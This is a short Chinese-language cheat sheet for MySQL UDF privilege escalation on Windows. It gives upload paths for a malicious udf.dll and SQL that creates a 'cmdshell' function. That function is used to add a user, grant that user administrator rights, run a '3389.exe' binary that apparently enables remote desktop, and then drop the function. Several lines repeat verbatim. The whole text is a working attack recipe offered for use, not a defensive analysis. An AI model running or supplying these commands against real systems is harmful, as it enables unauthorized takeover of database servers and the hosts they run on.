先马udf.dll文件上传到windows目录下
C:\Winnt\udf.dll 2000
C:\Windows\udf.dll 2003
C:\Windows\udf.dll 2003
执行的sql语句
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('e:\\3389.exe');
drop function cmdshell; 删除函数
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('e:\\3389.exe');
drop function cmdshell; 删除函数